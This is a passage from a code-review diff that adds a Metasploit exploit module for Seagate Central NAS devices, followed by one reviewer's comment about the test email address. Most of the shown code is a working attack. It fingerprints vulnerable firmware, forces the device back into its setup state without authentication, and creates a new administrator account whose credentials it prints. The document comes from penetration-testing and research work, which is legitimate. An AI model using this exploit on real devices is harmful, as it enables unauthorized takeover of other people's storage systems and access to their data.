modules/exploits/linux/http/seagate_central_ssh_user_add.rb

```diff
@@ -0,0 +1,215 @@
+      'Arch'           => [ARCH_CMD],
+      'Payload'        =>
+      {
+        'Compat' => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find'
+        }
+      },
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Dec 9 2019",
+      'DefaultTarget'  => 0
+    ))
+
+
+    register_options(
+      [
+        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),
+        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    },60)
+
+    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    # First get current state
+    first_state=get_state()
+    print_status("Current device state: #{first_state['state']}")
+    if first_state['state'] != 'start'
+      # Set new start state
+      first_state['state'] = 'start'
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'data'  => "info=#{first_state.to_json}"
+      },60)
+
+      changed_state=get_state()
+      if changed_state['state'] == 'start'
+        print_good("State successfully changed !")
+      else
+        print_error("Could not change device state")
+        return
+      end
+    end
+
+    name = Rex::Text.rand_name_male
+    user = datastore['USER']
+    pass = datastore['PASS']
+    if user == ''
+      user = name+rand(1..9999).to_s
+    end
+    if pass == ''
+      pass = Rex::Text.rand_text_alpha(8)
+    end
+    print_status('Creating new admin user...')
+    print_status("User: #{user}")
+    print_status("Pass: #{pass}")
+
+    # Add new admin user
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@test.com", isAdmin: true, uid: -1}), action: 1}
```

Comment:
Can the email address be randomized, or, better yet, can `@localhost` or `@localhost.local` be used ?